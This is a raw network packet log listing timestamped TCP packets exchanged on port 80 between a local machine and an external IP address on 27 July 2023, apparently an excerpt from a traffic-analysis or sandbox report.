Jul 27, 2023 20:19:00.089916945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089926958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.089951038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089975119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.089998007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090009928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090033054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090044022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090068102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090092897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090117931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090133905 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090152979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090162039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090186119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090210915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090221882 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090245008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090270042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090293884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090306044 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090327978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090338945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090362072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090387106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090411901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090424061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090445995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090466022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.090480089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.090559959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.093147993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.095916033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096029043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096091032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.096154928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096239090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096314907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.096452951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096519947 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.096566916 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096612930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.096663952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096718073 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.096764088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096848011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.096972942 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.097078085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.097177029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.097229958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.108755112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.109518051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.109608889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.109683990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.109778881 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.109842062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.109915972 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.109941006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110021114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110099077 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110155106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.110305071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110400915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.110441923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110519886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110600948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110670090 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.110713959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110794067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110821009 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.110866070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110912085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110959053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.110980034 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.111021996 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.111043930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111093998 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111140966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111335039 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.111633062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111680984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111725092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.111746073 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.111804008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.113635063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113686085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113732100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113778114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113800049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.113831997 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.113863945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113910913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.113955975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114002943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114021063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114067078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114088058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114136934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114187002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114233017 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114252090 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114296913 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114316940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114363909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114408970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114460945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114475012 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114506006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114537954 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114583969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114629030 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114675999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114694118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114737988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114759922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114805937 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114849091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114895105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.114912987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114942074 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.114975929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115021944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115075111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115088940 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115130901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115173101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115223885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115236998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115267992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115300894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115348101 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115391016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115436077 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115453959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115499973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115518093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115565062 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115607977 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115653992 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115673065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115726948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115741014 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115784883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115830898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115881920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115895033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115925074 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.115953922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.115998983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.116044044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.116091967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.120753050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.120811939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.120842934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.120874882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.120904922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.120929003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.120938063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.120969057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.120980978 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121012926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121042967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121076107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121088982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.121119022 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.121130943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121161938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121192932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121222973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.121236086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.121274948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.124840021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.132409096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.132467985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.132510900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.132536888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133249044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133291960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133335114 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133357048 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133384943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133419037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133466005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133507967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133548975 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133568048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133615971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133627892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133667946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133711100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133753061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133769989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133810043 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133829117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133871078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133913040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.133955956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.133971930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.134011030 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.134031057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.134073019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.134114027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.134155035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.134171963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.134211063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138293982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138341904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138390064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138411999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138458967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138506889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138561964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138583899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138624907 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138649940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138695955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138761997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138803959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138824940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138865948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.138889074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138935089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.138981104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139023066 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139048100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139091015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139116049 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139163017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139209032 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139252901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139275074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139317989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139343023 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139389038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139435053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139477015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139497995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139539957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139561892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139605999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139650106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139692068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139712095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139754057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139779091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139823914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139868975 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139914036 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139933109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.139974117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.139997959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140042067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140089035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140136957 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140176058 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140218019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140242100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140314102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140360117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140404940 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140424013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140466928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140490055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140535116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140580893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140621901 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140645981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140686035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.140708923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140753984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140799999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.140842915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.145597935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.145692110 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.145736933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.145768881 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.145807981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.145853996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.145905972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.145920038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.145948887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.145982027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146027088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146080017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146092892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.146136045 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146189928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146202087 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.146245003 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146290064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146342993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.146357059 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.146692991 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.154711008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156420946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156565905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156632900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156682014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156716108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.156749964 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.156766891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156806946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.156825066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156863928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156900883 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156938076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.156955004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.156984091 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.157007933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157048941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157099962 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157116890 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.157154083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157193899 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157238007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157248974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.157279015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.157300949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157339096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157377005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157422066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.157433033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.157460928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.162779093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163520098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163554907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163585901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163618088 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163633108 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163659096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.163677931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163710117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.163741112 CEST	80	49693	45.9.74.80	192.168.2.4
